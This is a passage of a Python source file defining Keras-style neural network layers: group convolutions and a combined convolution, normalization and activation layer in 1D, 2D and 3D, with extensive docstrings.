Can be a single integer to specify the same value for
all spatial dimensions.
strides: An integer or tuple/list of 2 integers,
specifying the strides of the convolution along the height and width.
Can be a single integer to specify the same value for
all spatial dimensions.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
padding: one of `"valid"` or `"same"` (case-insensitive).
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, height, width, channels)` while `channels_first`
corresponds to inputs with shape
`(batch, channels, height, width)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
dilation_rate: an integer or tuple/list of 2 integers, specifying
the dilation rate to use for dilated convolution.
Can be a single integer to specify the same value for
all spatial dimensions.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any stride value != 1.
activation: Activation function to use.
If you don't specify anything, no activation is applied
(i.e. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
kernel_initializer: Initializer for the `kernel` weights matrix.
bias_initializer: Initializer for the bias vector.
kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix.
bias_regularizer: Regularizer function applied to the bias vector.
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
kernel_constraint: Constraint function applied to the kernel matrix.
bias_constraint: Constraint function applied to the bias vector.
Input shape:
4D tensor with shape:
`(samples, channels, rows, cols)` if data_format='channels_first'
or 4D tensor with shape:
`(samples, rows, cols, channels)` if data_format='channels_last'.
Output shape:
4D tensor with shape:
`(samples, filters, new_rows, new_cols)` if data_format='channels_first'
or 4D tensor with shape:
`(samples, new_rows, new_cols, filters)` if data_format='channels_last'.
`rows` and `cols` values might have changed due to padding.
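Example:
As a rough illustration (a hypothetical sketch, not part of the layer API),
the parameter saving of a group convolution over a dense convolution can be
computed in plain Python; the helper names below are made up for this example:
```python
# Hypothetical sketch: kernel parameter counts of a dense 2D convolution
# versus a group convolution with `lgroups` groups (bias terms ignored).
def dense_conv2d_params(in_channels, filters, kernel_size):
    return in_channels * filters * kernel_size * kernel_size

def group_conv2d_params(in_channels, lgroups, lfilters, kernel_size):
    # Each group convolves in_channels // lgroups input channels to
    # lfilters output channels, independently of the other groups.
    per_group = (in_channels // lgroups) * lfilters * kernel_size * kernel_size
    return lgroups * per_group

dense = dense_conv2d_params(64, 64, 3)                            # 36864
grouped = group_conv2d_params(64, lgroups=4, lfilters=16, kernel_size=3)
# grouped == dense // 4: each group's kernel sees only a quarter
# of the input channels, so the kernel is 4x smaller overall.
```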
"""
def __init__(self,
lgroups,
lfilters,
kernel_size,
strides=(1, 1),
padding='valid',
data_format=None,
dilation_rate=(1, 1),
activation=None,
use_bias=True,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
**kwargs):
super(GroupConv2D, self).__init__(
rank=2,
lgroups=lgroups,
lfilters=lfilters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
activation=activations.get(activation),
use_bias=use_bias,
kernel_initializer=initializers.get(kernel_initializer),
bias_initializer=initializers.get(bias_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
bias_regularizer=regularizers.get(bias_regularizer),
activity_regularizer=regularizers.get(activity_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
bias_constraint=constraints.get(bias_constraint),
**kwargs)
class GroupConv3D(_GroupConv):
"""3D group convolution layer (e.g. spatial group convolution over volumes).
This layer creates a convolution kernel that is convolved
with the layer input to produce a tensor of outputs.
Unlike plain `Conv` layers, `GroupConv` divides the input
channels into several groups and applies an ordinary (also called
dense) convolution to each group. Inside each group the convolution
is dense, while the convolutions of different groups are independent.
If `use_bias` is True, a bias vector is created and added to the outputs.
Finally, if `activation` is not `None`, it is applied to the outputs as well.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 128, 128, 1)` for 128x128x128 volumes
with a single channel,
in `data_format="channels_last"`.
Arguments:
lgroups: Integer, the number of latent convolution groups (branches). The
total number of filters in the latent space is lgroups * lfilters.
lfilters: Integer, the dimensionality of each latent group (i.e. the
number of filters in each latent convolution branch).
kernel_size: An integer or tuple/list of 3 integers, specifying the
depth, height and width of the 3D convolution window.
Can be a single integer to specify the same value for
all spatial dimensions.
strides: An integer or tuple/list of 3 integers,
specifying the strides of the convolution along each spatial
dimension.
Can be a single integer to specify the same value for
all spatial dimensions.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
padding: one of `"valid"` or `"same"` (case-insensitive).
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, spatial_dim1, spatial_dim2, spatial_dim3, channels)`
while `channels_first` corresponds to inputs with shape
`(batch, channels, spatial_dim1, spatial_dim2, spatial_dim3)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
dilation_rate: an integer or tuple/list of 3 integers, specifying
the dilation rate to use for dilated convolution.
Can be a single integer to specify the same value for
all spatial dimensions.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any stride value != 1.
activation: Activation function to use.
If you don't specify anything, no activation is applied
(i.e. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
kernel_initializer: Initializer for the `kernel` weights matrix.
bias_initializer: Initializer for the bias vector.
kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix.
bias_regularizer: Regularizer function applied to the bias vector.
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
kernel_constraint: Constraint function applied to the kernel matrix.
bias_constraint: Constraint function applied to the bias vector.
Input shape:
5D tensor with shape:
`(samples, channels, conv_dim1, conv_dim2, conv_dim3)` if
data_format='channels_first'
or 5D tensor with shape:
`(samples, conv_dim1, conv_dim2, conv_dim3, channels)` if
data_format='channels_last'.
Output shape:
5D tensor with shape:
`(samples, filters, new_conv_dim1, new_conv_dim2, new_conv_dim3)` if
data_format='channels_first'
or 5D tensor with shape:
`(samples, new_conv_dim1, new_conv_dim2, new_conv_dim3, filters)` if
data_format='channels_last'.
`new_conv_dim1`, `new_conv_dim2` and `new_conv_dim3` values might have
changed due to padding.
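Example:
The channel bookkeeping of a group convolution can be sketched in plain
Python (a hypothetical helper, not part of this module): the input channels
must split evenly into lgroups groups, and the output carries
lgroups * lfilters channels.
```python
def group_conv_channels(in_channels, lgroups, lfilters):
    # Hypothetical helper: validates the group split and returns the
    # per-group input width and the total output width.
    if in_channels % lgroups != 0:
        raise ValueError('in_channels must be a multiple of lgroups')
    return in_channels // lgroups, lgroups * lfilters

per_group_in, out_channels = group_conv_channels(32, lgroups=4, lfilters=8)
# per_group_in == 8, out_channels == 32
```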
"""
def __init__(self,
lgroups,
lfilters,
kernel_size,
strides=(1, 1, 1),
padding='valid',
data_format=None,
dilation_rate=(1, 1, 1),
activation=None,
use_bias=True,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
**kwargs):
super(GroupConv3D, self).__init__(
rank=3,
lgroups=lgroups,
lfilters=lfilters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
activation=activations.get(activation),
use_bias=use_bias,
kernel_initializer=initializers.get(kernel_initializer),
bias_initializer=initializers.get(bias_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
bias_regularizer=regularizers.get(bias_regularizer),
activity_regularizer=regularizers.get(activity_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
bias_constraint=constraints.get(bias_constraint),
**kwargs)
class _AConv(Layer):
"""Modern convolutional layer.
Abstract nD convolution layer (private, used as implementation base).
`_AConv` implements the operation:
`output = activation( normalization( conv(x, W), gamma, beta ), alpha )`
This layer is a stack of convolution, normalization and activation.
As an extension, we allow users to use parametric activation layers
such as PReLU.
Arguments for convolution:
rank: An integer, the rank of the convolution, e.g. "2" for 2D convolution.
filters: Integer, the dimensionality of the output space (i.e. the number
of filters in the convolution).
kernel_size: An integer or tuple/list of n integers, specifying the
length of the convolution window.
strides: An integer or tuple/list of n integers,
specifying the stride length of the convolution.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
lgroups: Latent group number of group convolution. Group convolution
is used only when this argument is set. The latent filter number is
inferred as lfilters = filters // lgroups, so filters should be
a multiple of lgroups.
padding: One of `"valid"`, `"same"`, or `"causal"` (case-insensitive).
data_format: A string, one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, ..., channels)` while `channels_first` corresponds to
inputs with shape `(batch, channels, ...)`.
dilation_rate: An integer or tuple/list of n integers, specifying
the dilation rate to use for dilated convolution.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any `strides` value != 1.
kernel_initializer: An initializer for the convolution kernel.
kernel_regularizer: Optional regularizer for the convolution kernel.
kernel_constraint: Optional projection function to be applied to the
kernel after being updated by an `Optimizer` (e.g. used to implement
norm constraints or value constraints for layer weights). The function
must take as input the unprojected variable and must return the
projected variable (which must have the same shape). Constraints are
not safe to use when doing asynchronous distributed training.
trainable: Boolean, if `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
name: A string, the name of the layer.
Arguments for normalization:
normalization: The normalization type, which could be
(1) None: do not use normalization and do not add biases.
(2) bias: apply biases instead of using normalization.
(3) batch: use batch normalization.
(4) inst: use instance normalization.
(5) group: use group normalization.
If using (2), the initializer, regularizer and constraint for
beta would be applied to the bias of convolution.
beta_initializer: Initializer for the beta weight.
gamma_initializer: Initializer for the gamma weight.
beta_regularizer: Optional regularizer for the beta weight.
gamma_regularizer: Optional regularizer for the gamma weight.
beta_constraint: Optional constraint for the beta weight.
gamma_constraint: Optional constraint for the gamma weight.
groups (only for group normalization): Integer, the number of
groups for Group Normalization.
Can be in the range [1, N] where N is the input dimension.
The input dimension must be divisible by the number of groups.
Arguments for activation:
activation: Activation function to use
(see [activations](../activations.md)).
If you don't specify anything, no activation is applied
(i.e. "linear" activation: `a(x) = x`).
activity_config: keywords for the parameters of activation
function (only for lrelu).
Arguments (others):
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
(see [regularizer](../regularizers.md)).
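The interaction between `normalization` and the convolution bias can be
summarized by the following plain-Python sketch, which mirrors the
constructor logic of this layer (the helper name is hypothetical):
```python
def uses_conv_bias(normalization):
    # Mirrors the constructor logic of _AConv: a real normalization
    # layer carries its own beta offset, so the convolution bias is
    # dropped; the 'bias' option re-enables the bias; None disables both.
    if normalization in ('batch', 'inst', 'group'):
        return False   # beta/gamma handled by the normalization layer
    elif normalization:
        return True    # e.g. 'bias': beta settings applied to the conv bias
    else:
        return False   # no normalization, no bias
```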
"""
def __init__(self, rank,
filters,
kernel_size,
strides=1,
lgroups=None,
padding='valid',
data_format=None,
dilation_rate=1,
kernel_initializer='glorot_uniform',
kernel_regularizer=None,
kernel_constraint=None,
normalization='inst',
beta_initializer='zeros',
gamma_initializer='ones',
beta_regularizer=None,
gamma_regularizer=None,
beta_constraint=None,
gamma_constraint=None,
groups=32,
activation=None,
activity_config=None,
activity_regularizer=None,
trainable=True,
name=None,
_high_activation=None,
**kwargs):
if 'input_shape' not in kwargs and 'input_dim' in kwargs:
kwargs['input_shape'] = (kwargs.pop('input_dim'),)
super(_AConv, self).__init__(trainable=trainable, name=name, activity_regularizer=regularizers.get(activity_regularizer), **kwargs)
# Inherit from keras.layers._Conv
self.rank = rank
self.filters = filters
self.lgroups = lgroups
if (lgroups is not None) and (lgroups > 1):
if filters % lgroups != 0:
raise ValueError('To group the output channels, the output channel number should be a multiple of the group number (N*{0}), but got {1}'.format(self.lgroups, self.filters))
self.kernel_size = conv_utils.normalize_tuple(
kernel_size, rank, 'kernel_size')
self.strides = conv_utils.normalize_tuple(strides, rank, 'strides')
self.padding = conv_utils.normalize_padding(padding)
if (self.padding == 'causal' and not isinstance(self, AConv1D)):
raise ValueError('Causal padding is only supported for `AConv1D`.')
self.data_format = conv_utils.normalize_data_format(data_format)
self.dilation_rate = conv_utils.normalize_tuple(
dilation_rate, rank, 'dilation_rate')
self.kernel_initializer = initializers.get(kernel_initializer)
self.kernel_regularizer = regularizers.get(kernel_regularizer)
self.kernel_constraint = constraints.get(kernel_constraint)
# Inherit from mdnt.layers.normalize
self.normalization = normalization
if isinstance(normalization, str) and normalization in ('batch', 'inst', 'group'):
self.use_bias = False
self.gamma_initializer = initializers.get(gamma_initializer)
self.gamma_regularizer = regularizers.get(gamma_regularizer)
self.gamma_constraint = constraints.get(gamma_constraint)
elif normalization:
self.use_bias = True
self.gamma_initializer = None
self.gamma_regularizer = None
self.gamma_constraint = None
else:
self.use_bias = False
self.gamma_initializer = None
self.gamma_regularizer = None
self.gamma_constraint = None
self.beta_initializer = initializers.get(beta_initializer)
self.beta_regularizer = regularizers.get(beta_regularizer)
self.beta_constraint = constraints.get(beta_constraint)
self.groups = groups
# Inherit from keras.engine.Layer
if _high_activation is not None:
activation = _high_activation
self.high_activation = _high_activation
self.use_plain_activation = False
if isinstance(activation, str) and (activation.casefold() in ('prelu','lrelu')):
self.activation = activations.get(None)
self.high_activation = activation.casefold()
self.activity_config = activity_config # dictionary passed to activation
if activity_config is None:
self.activity_config = dict()
elif activation is not None:
self.use_plain_activation = True
self.activation = activations.get(activation)
self.activity_config = None
else:
self.activation = activations.get(None)
self.activity_config = None
self.trainable = trainable
self.input_spec = InputSpec(ndim=self.rank + 2)
def build(self, input_shape):
if self.data_format == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
if self.use_bias:
bias_initializer = self.beta_initializer
bias_regularizer = self.beta_regularizer
bias_constraint = self.beta_constraint
else:
bias_initializer = None
bias_regularizer = None
bias_constraint = None
if (self.lgroups is not None) and (self.lgroups > 1):
self.layer_conv = _GroupConv(rank=self.rank,
lgroups=self.lgroups,
lfilters=self.filters // self.lgroups,
kernel_size=self.kernel_size,
strides=self.strides,
padding=self.padding,
data_format=self.data_format,
dilation_rate=self.dilation_rate,
activation=None,
use_bias=self.use_bias,
bias_initializer=bias_initializer,
bias_regularizer=bias_regularizer,
bias_constraint=bias_constraint,
kernel_initializer=self.kernel_initializer,
kernel_regularizer=self.kernel_regularizer,
kernel_constraint=self.kernel_constraint,
trainable=self.trainable)
else:
self.layer_conv = Conv(rank=self.rank,
filters=self.filters,
kernel_size=self.kernel_size,
strides=self.strides,
padding=self.padding,
data_format=self.data_format,
dilation_rate=self.dilation_rate,
activation=None,
use_bias=self.use_bias,
bias_initializer=bias_initializer,
bias_regularizer=bias_regularizer,
bias_constraint=bias_constraint,
kernel_initializer=self.kernel_initializer,
kernel_regularizer=self.kernel_regularizer,
kernel_constraint=self.kernel_constraint,
trainable=self.trainable)
self.layer_conv.build(input_shape)
compat.collect_properties(self, self.layer_conv) # for compatibility
next_shape = self.layer_conv.compute_output_shape(input_shape)
if self.normalization and (not self.use_bias):
if self.normalization.casefold() == 'batch':
self.layer_norm = BatchNormalization(axis=channel_axis,
gamma_initializer=self.gamma_initializer,
gamma_regularizer=self.gamma_regularizer,
gamma_constraint=self.gamma_constraint,
beta_initializer=self.beta_initializer,
beta_regularizer=self.beta_regularizer,
beta_constraint=self.beta_constraint,
trainable=self.trainable)
elif self.normalization.casefold() == 'inst':
self.layer_norm = InstanceNormalization(axis=channel_axis,
gamma_initializer=self.gamma_initializer,
gamma_regularizer=self.gamma_regularizer,
gamma_constraint=self.gamma_constraint,
beta_initializer=self.beta_initializer,
beta_regularizer=self.beta_regularizer,
beta_constraint=self.beta_constraint,
trainable=self.trainable)
elif self.normalization.casefold() == 'group':
self.layer_norm = GroupNormalization(axis=channel_axis, groups=self.groups,
gamma_initializer=self.gamma_initializer,
gamma_regularizer=self.gamma_regularizer,
gamma_constraint=self.gamma_constraint,
beta_initializer=self.beta_initializer,
beta_regularizer=self.beta_regularizer,
beta_constraint=self.beta_constraint,
trainable=self.trainable)
self.layer_norm.build(next_shape)
compat.collect_properties(self, self.layer_norm) # for compatibility
next_shape = self.layer_norm.compute_output_shape(next_shape)
if self.high_activation == 'prelu':
shared_axes = tuple(range(1,self.rank+1))
self.layer_actv = PReLU(shared_axes=shared_axes)
self.layer_actv.build(next_shape)
compat.collect_properties(self, self.layer_actv) # for compatibility
elif self.high_activation == 'lrelu':
alpha = self.activity_config.get('alpha', 0.3)
self.layer_actv = LeakyReLU(alpha=alpha)
self.layer_actv.build(next_shape)
super(_AConv, self).build(input_shape)
def call(self, inputs):
outputs = self.layer_conv(inputs)
if self.normalization and (not self.use_bias):
outputs = self.layer_norm(outputs)
if self.high_activation in ('prelu', 'lrelu'):
outputs = self.layer_actv(outputs)
if self.use_plain_activation:
return self.activation(outputs) # pylint: disable=not-callable
return outputs
def compute_output_shape(self, input_shape):
next_shape = self.layer_conv.compute_output_shape(input_shape)
if self.normalization and (not self.use_bias):
next_shape = self.layer_norm.compute_output_shape(next_shape)
if self.high_activation in ('prelu', 'lrelu'):
next_shape = self.layer_actv.compute_output_shape(next_shape)
return next_shape
def get_config(self):
config = {
'filters': self.filters,
'kernel_size': self.kernel_size,
'strides': self.strides,
'lgroups': self.lgroups,
'padding': self.padding,
'data_format': self.data_format,
'dilation_rate': self.dilation_rate,
'kernel_initializer': initializers.serialize(self.kernel_initializer),
'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
'kernel_constraint': constraints.serialize(self.kernel_constraint),
'normalization': self.normalization,
'beta_initializer': initializers.serialize(self.beta_initializer),
'gamma_initializer': initializers.serialize(self.gamma_initializer),
'beta_regularizer': regularizers.serialize(self.beta_regularizer),
'gamma_regularizer': regularizers.serialize(self.gamma_regularizer),
'beta_constraint': constraints.serialize(self.beta_constraint),
'gamma_constraint': constraints.serialize(self.gamma_constraint),
'groups': self.groups,
'activation': activations.serialize(self.activation),
'activity_config': self.activity_config,
'activity_regularizer': regularizers.serialize(self.activity_regularizer),
'_high_activation': self.high_activation
}
base_config = super(_AConv, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class AConv1D(_AConv):
"""1D convolution layer (e.g. temporal convolution).
This layer creates a convolution kernel that is convolved
with the layer input over a single spatial (or temporal) dimension
to produce a tensor of outputs.
If `use_bias` is True, a bias vector is created and added to the outputs.
Finally, if `activation` is not `None`,
it is applied to the outputs as well.
When using this layer as the first layer in a model,
provide an `input_shape` argument
(tuple of integers or `None`, e.g.
`(10, 128)` for sequences of 10 vectors of 128-dimensional vectors,
or `(None, 128)` for variable-length sequences of 128-dimensional vectors).
The abstract architecture of AConv1D is:
`output = activation( normalization( conv(x, W), gamma, beta ), alpha )`
This layer is a stack of convolution, normalization and activation.
As an extension, we allow users to use parametric activation layers
such as PReLU.
Arguments for convolution:
filters: Integer, the dimensionality of the output space
(i.e. the number of output filters in the convolution).
kernel_size: An integer or tuple/list of a single integer,
specifying the length of the 1D convolution window.
strides: An integer or tuple/list of a single integer,
specifying the stride length of the convolution.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
lgroups: Latent group number of group convolution. Group convolution
is used only when this argument is set. The latent filter number is
inferred as lfilters = filters // lgroups, so filters should be
a multiple of lgroups.
padding: One of `"valid"`, `"causal"` or `"same"` (case-insensitive).
`"causal"` results in causal (dilated) convolutions, e.g. output[t]
does not depend on input[t+1:]. Useful when modeling temporal data
where the model should not violate the temporal order.
See [WaveNet: A Generative Model for Raw Audio, section
2.1](https://arxiv.org/abs/1609.03499).
data_format: A string,
one of `channels_last` (default) or `channels_first`.
dilation_rate: an integer or tuple/list of a single integer, specifying
the dilation rate to use for dilated convolution.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any `strides` value != 1.
kernel_initializer: Initializer for the `kernel` weights matrix.
kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix.
kernel_constraint: Constraint function applied to the kernel matrix.
Arguments for normalization:
normalization: The normalization type, which could be
(1) None: do not use normalization and do not add biases.
(2) bias: apply biases instead of using normalization.
(3) batch: use batch normalization.
(4) inst: use instance normalization.
(5) group: use group normalization.
If using (2), the initializer, regularizer and constraint for
beta would be applied to the bias of convolution.
beta_initializer: Initializer for the beta weight.
gamma_initializer: Initializer for the gamma weight.
beta_regularizer: Optional regularizer for the beta weight.
gamma_regularizer: Optional regularizer for the gamma weight.
beta_constraint: Optional constraint for the beta weight.
gamma_constraint: Optional constraint for the gamma weight.
groups (only for group normalization): Integer, the number of
groups for Group Normalization.
Can be in the range [1, N] where N is the input dimension.
The input dimension must be divisible by the number of groups.
Arguments for activation:
activation: Activation function to use
(see [activations](../activations.md)).
If you don't specify anything, no activation is applied
(i.e. "linear" activation: `a(x) = x`).
activity_config: keywords for the parameters of activation
function (only for lrelu).
Arguments (others):
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
(see [regularizer](../regularizers.md)).
Input shape:
3D tensor with shape: `(batch_size, steps, input_dim)`
Output shape:
3D tensor with shape: `(batch_size, new_steps, filters)`
`steps` value might have changed due to padding or strides.
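Example:
The amount of left-only zero padding used by causal convolution can be
sketched in plain Python (a hypothetical helper illustrating the standard
formula, not part of this module):
```python
def causal_pad_width(kernel_size, dilation_rate=1):
    # Left-only zero padding that keeps output[t] independent of
    # input[t + 1:], as used by causal (dilated) convolutions: the
    # receptive field extends dilation_rate * (kernel_size - 1) steps
    # into the past, so that many zeros are prepended.
    return dilation_rate * (kernel_size - 1)

causal_pad_width(3)      # 2: an undilated width-3 kernel looks back 2 steps
causal_pad_width(2, 8)   # 8: dilation stretches the look-back window
```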
"""
def __init__(self,
filters,
kernel_size,
strides=1,
lgroups=None,
padding='valid',
data_format='channels_last',
dilation_rate=1,
kernel_initializer='glorot_uniform',
kernel_regularizer=None,
kernel_constraint=None,
normalization='inst',
beta_initializer='zeros',
gamma_initializer='ones',
beta_regularizer=None,
gamma_regularizer=None,
beta_constraint=None,
gamma_constraint=None,
groups=32,
activation=None,
activity_config=None,
activity_regularizer=None,
**kwargs):
super(AConv1D, self).__init__(
rank=1,
filters=filters,
kernel_size=kernel_size,
strides=strides,
lgroups=lgroups,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
kernel_initializer=initializers.get(kernel_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
normalization=normalization,
beta_initializer=initializers.get(beta_initializer),
gamma_initializer=initializers.get(gamma_initializer),
beta_regularizer=regularizers.get(beta_regularizer),
gamma_regularizer=regularizers.get(gamma_regularizer),
beta_constraint=constraints.get(beta_constraint),
gamma_constraint=constraints.get(gamma_constraint),
groups=groups,
activation=activation,
activity_config=activity_config,
activity_regularizer=regularizers.get(activity_regularizer),
**kwargs)
def call(self, inputs):
if self.padding == 'causal':
inputs = array_ops.pad(inputs, self._compute_causal_padding())
return super(AConv1D, self).call(inputs)
class AConv2D(_AConv):
"""2D convolution layer (e.g. spatial convolution over images).
This layer creates a convolution kernel that is convolved
with the layer input to produce a tensor of
outputs. If `use_bias` is True,
a bias vector is created and added to the outputs. Finally, if
`activation` is not `None`, it is applied to the outputs as well.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 128, 3)` for 128x128 RGB pictures
in `data_format="channels_last"`.
The abstract architecture of AConv2D is:
`output = activation( normalization( conv(x, W), gamma, beta ), alpha )`
This layer is a stack of convolution, normalization and activation.
As an extension, we allow users to use parametric activation layers
such as PReLU.
Arguments for convolution:
filters: Integer, the dimensionality of the output space
(i.e. the number of output filters in the convolution).
kernel_size: An integer or tuple/list of 2 integers, specifying the
height and width of the 2D convolution window.
Can be a single integer to specify the same value for
all spatial dimensions.
strides: An integer or tuple/list of 2 integers,
specifying the strides of the convolution along the height and width.
Can be a single integer to specify the same value for
all spatial dimensions.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
lgroups: Latent group number of group convolution. Group convolution
is used only when this argument is set. The latent filter number is
inferred as lfilters = filters // lgroups, so filters should be
a multiple of lgroups.
padding: one of `"valid"` or `"same"` (case-insensitive).
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, height, width, channels)` while `channels_first`
corresponds to inputs with shape
`(batch, channels, height, width)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
dilation_rate: an integer or tuple/list of 2 integers, specifying
the dilation rate to use for dilated convolution.
Can be a single integer to specify the same value for
all spatial dimensions.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any stride value != 1.
kernel_initializer: Initializer for the `kernel` weights matrix.
kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix.
kernel_constraint: Constraint function applied to the kernel matrix.
Arguments for normalization:
normalization: The normalization type, which could be
(1) None: do not use normalization and do not add biases.
(2) bias: apply biases instead of using normalization.
(3) batch: use batch normalization.
(4) inst: use instance normalization.
(5) group: use group normalization.
If using (2), the initializer, regularizer and constraint for
beta would be applied to the bias of convolution.
beta_initializer: Initializer for the beta weight.
gamma_initializer: Initializer for the gamma weight.
beta_regularizer: Optional regularizer for the beta weight.
gamma_regularizer: Optional regularizer for the gamma weight.
beta_constraint: Optional constraint for the beta weight.
gamma_constraint: Optional constraint for the gamma weight.
groups (only for group normalization): Integer, the number of
groups for Group Normalization.
Can be in the range [1, N] where N is the input dimension.
The input dimension must be divisible by the number of groups.
Arguments for activation:
activation: Activation function to use
(see [activations](../activations.md)).
If you don't specify anything, no activation is applied
(i.e. "linear" activation: `a(x) = x`).
activity_config: keywords for the parameters of activation
function (only for lrelu).
Arguments (others):
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
(see [regularizer](../regularizers.md)).
Input shape:
4D tensor with shape:
`(samples, channels, rows, cols)` if data_format='channels_first'
or 4D tensor with shape:
`(samples, rows, cols, channels)` if data_format='channels_last'.
Output shape:
4D tensor with shape:
`(samples, filters, new_rows, new_cols)` if data_format='channels_first'
or 4D tensor with shape:
`(samples, new_rows, new_cols, filters)` if data_format='channels_last'.
`rows` and `cols` values might have changed due to padding.
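Example:
How `new_rows` and `new_cols` follow from the padding mode can be sketched
with the usual Keras shape arithmetic (a hypothetical helper written for
illustration, not part of this module):
```python
import math

def conv_output_length(length, kernel_size, stride, padding, dilation_rate=1):
    # Hypothetical helper mirroring the usual Keras shape arithmetic
    # for one spatial dimension of a convolution.
    k_eff = kernel_size + (kernel_size - 1) * (dilation_rate - 1)
    if padding == 'same':
        return math.ceil(length / stride)
    # 'valid' padding: only fully-covered windows are kept.
    return math.ceil((length - k_eff + 1) / stride)

conv_output_length(128, 3, 1, 'valid')  # 126
conv_output_length(128, 3, 2, 'same')   # 64
```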
"""
def __init__(self,
filters,
kernel_size,
strides=(1, 1),
lgroups=None,
padding='valid',
data_format='channels_last',
dilation_rate=(1, 1),
kernel_initializer='glorot_uniform',
kernel_regularizer=None,
kernel_constraint=None,
normalization='inst',
beta_initializer='zeros',
gamma_initializer='ones',
beta_regularizer=None,
gamma_regularizer=None,
beta_constraint=None,
gamma_constraint=None,
groups=32,
activation=None,
activity_config=None,
activity_regularizer=None,
**kwargs):
super(AConv2D, self).__init__(
rank=2,
filters=filters,
kernel_size=kernel_size,
strides=strides,
lgroups=lgroups,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
kernel_initializer=initializers.get(kernel_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
normalization=normalization,
beta_initializer=initializers.get(beta_initializer),
gamma_initializer=initializers.get(gamma_initializer),
beta_regularizer=regularizers.get(beta_regularizer),
gamma_regularizer=regularizers.get(gamma_regularizer),
beta_constraint=constraints.get(beta_constraint),
gamma_constraint=constraints.get(gamma_constraint),
groups=groups,
activation=activation,
activity_config=activity_config,
activity_regularizer=regularizers.get(activity_regularizer),
**kwargs)
class AConv3D(_AConv):
"""3D convolution layer (e.g. spatial convolution over volumes).
This layer creates a convolution kernel that is convolved
with the layer input to produce a tensor of
outputs. If `use_bias` is True,
a bias vector is created and added to the outputs. Finally, if
`activation` is not `None`, it is applied to the outputs as well.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 128, 128, 1)` for 128x128x128 volumes
with a single channel,
in `data_format="channels_last"`.
The abstract architecture of AConv3D is:
`output = activation( normalization( conv(x, W), gamma, beta ), alpha )`
This layer is a stack of convolution, normalization and activation.
As an extension, we allow users to use activating layers with parameters
like PRelu.
Arguments for convolution:
filters: Integer, the dimensionality of the output space
(i.e. the number of output filters in the convolution).
kernel_size: An integer or tuple/list of 3 integers, specifying the
depth, height and width of the 3D convolution window.
Can be a single integer to specify the same value for
all spatial dimensions.
strides: An integer or tuple/list of 3 integers,
specifying the strides of the convolution along each spatial
dimension.
Can be a single integer to specify the same value for
all spatial dimensions.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
lgroups: Latent group number of the group convolution. Group convolution
is used only when this option is set. The latent filter number of the
group convolution is inferred as lfilters = filters // lgroups. Hence,
filters should be a multiple of lgroups.
padding: one of `"valid"` or `"same"` (case-insensitive).
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, spatial_dim1, spatial_dim2, spatial_dim3, channels)`
while `channels_first` corresponds to inputs with shape
